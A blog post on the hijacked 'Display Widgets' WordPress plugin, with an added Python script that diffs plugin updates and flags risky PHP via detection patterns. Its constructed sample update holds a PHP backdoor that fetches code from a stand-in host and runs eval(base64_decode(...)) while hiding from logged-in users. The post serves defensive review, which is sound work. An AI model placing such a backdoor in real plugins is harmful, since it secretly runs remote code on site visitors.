I stumbled across this story while working on one of my websites. I use numerous plugins on the WordPress sites I manage, and one day I was updating a plugin named ‘Display Widgets’ and got an error when trying to update.
For background, for those of you who are not WordPressers: WordPress is a website package that makes it easy to build full-featured websites quickly. Plugins add custom components to a standard install, for instance contact forms, weather info, or stock market info. Widgets are the boxes in a site's layout that display many of these features: if someone has a box on their website showing weather info, that is most likely a weather plugin configured to render inside a WordPress widget.
Anyway... I started googling to see what was going on with this widget, and came across this great detective work put together by the folks at Wordfence:
https://www.wordfence.com/blog/2017/09/display-widgets-malware/
The post chronicles the history of the plugin and gives a little insight into how the plugin market works. Who knew you could sell an innocuous plugin for $20,000? It also makes the point that a plugin being safe when you install it does not mean every later update is safe, especially once the plugin has changed hands and the new owner is trying to monetize the code. Every update you apply is a decision to trust whoever controls the plugin today, not whoever wrote it originally, so it is worth knowing who that is and what actually changed before you click "update".
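One practical way to act on that point is to review what an update changes before applying it, rather than trusting the version number. The script below is an added example written for this post; it is not code from the page, from Wordfence, or from the Display Widgets plugin. It diffs the installed copy of a plugin against the downloaded candidate update and flags risky PHP constructs that appear only in added or changed lines: remote fetches, dynamic code execution, obfuscation helpers, and logic that behaves differently for logged-in users (a common way to hide injected content from the site admin). The two plugin trees it reviews are constructed samples with made-up file and function names; the pattern list is this example's own heuristic, not an official WordPress check.

```python
"""Pre-update review for a WordPress plugin (added example).

Diffs the installed plugin directory against the candidate update and
reports risky PHP constructs introduced by the update. The sample plugin
trees at the bottom are constructed for this example; they are not the
real Display Widgets code.
"""
import difflib
import os
import re
import tempfile

# Heuristic patterns chosen for this example. An innocuous widget plugin
# rarely needs any of these, so their appearance in an update deserves a look.
RISKY_PATTERNS = {
    "remote_fetch": re.compile(
        r"\b(wp_remote_get|wp_remote_post|curl_exec|file_get_contents)\s*\(\s*['\"]https?://"),
    "dynamic_code": re.compile(r"\b(eval|create_function|assert)\s*\("),
    "obfuscation": re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\("),
    "remote_include": re.compile(r"\b(include|require)(_once)?\s*\(?\s*['\"]https?://"),
    "admin_cloaking": re.compile(r"is_user_logged_in\s*\(\s*\)"),
}


def php_files(root):
    """Map relative path -> list of lines for every .php file under root."""
    out = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    out[os.path.relpath(full, root)] = fh.read().splitlines()
    return out


def review_update(installed_dir, candidate_dir):
    """Return (file, line_no, category, line) for risky constructs that the
    update adds or changes. Lines already present in the installed copy are
    ignored, so the output is only what this particular update introduces."""
    old = php_files(installed_dir)
    new = php_files(candidate_dir)
    findings = []
    for rel, new_lines in sorted(new.items()):
        old_lines = old.get(rel, [])  # a brand-new file counts as all-added
        changed = set()
        matcher = difflib.SequenceMatcher(a=old_lines, b=new_lines)
        for tag, _i1, _i2, j1, j2 in matcher.get_opcodes():
            if tag in ("insert", "replace"):
                changed.update(range(j1, j2))
        for idx in sorted(changed):
            line = new_lines[idx]
            for category, pattern in RISKY_PATTERNS.items():
                if pattern.search(line):
                    findings.append((rel, idx + 1, category, line.strip()))
    return findings


# Constructed sample: the currently installed (benign) version of a plugin.
INSTALLED_VERSION = {
    "example-widgets.php": """<?php
/* Plugin Name: Example Widgets (constructed sample, not a real plugin) */
add_action('widgets_init', 'ew_register');
function ew_register() { register_widget('EW_Widget'); }
""",
}

# Constructed sample: the candidate update, which pulls in a new file that
# fetches and executes remote code while hiding its effect from logged-in users.
CANDIDATE_UPDATE = {
    "example-widgets.php": """<?php
/* Plugin Name: Example Widgets (constructed sample, not a real plugin) */
add_action('widgets_init', 'ew_register');
function ew_register() { register_widget('EW_Widget'); }
require_once dirname(__FILE__) . '/inc/geo.php';
""",
    "inc/geo.php": """<?php
// constructed sample of the kind of code an update should never quietly add
function ew_fetch_extra() {
    if (is_user_logged_in()) { return ''; }
    $r = wp_remote_get('http://example.invalid/payload');
    return eval(base64_decode($r['body']));
}
""",
}


def write_tree(files):
    """Materialise a {relative_path: content} mapping in a fresh temp dir."""
    root = tempfile.mkdtemp()
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


def demo():
    """Review the constructed update and return its findings."""
    return review_update(write_tree(INSTALLED_VERSION), write_tree(CANDIDATE_UPDATE))


if __name__ == "__main__":
    for path, line_no, category, line in demo():
        print(f"{path}:{line_no} [{category}] {line}")
```

On a real site you would point `review_update` at `wp-content/plugins/<slug>` and at the unpacked zip of the new version before replacing it. The point of diffing rather than scanning the whole plugin is that long-lived plugins accumulate legitimate uses of some of these functions; what you want to see is what the new owner changed.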
So this is a great reminder to be careful with all the free code we use. In most cases authors share code because they want to show their work, but in some cases we users are just a vehicle for someone else's illicit motives. In this day and age of pay-per-click dollars and email spam marketing, there are lots of people who want to use the unwitting public to make money. Remember the old saying: if you are not paying for the product, you are the product.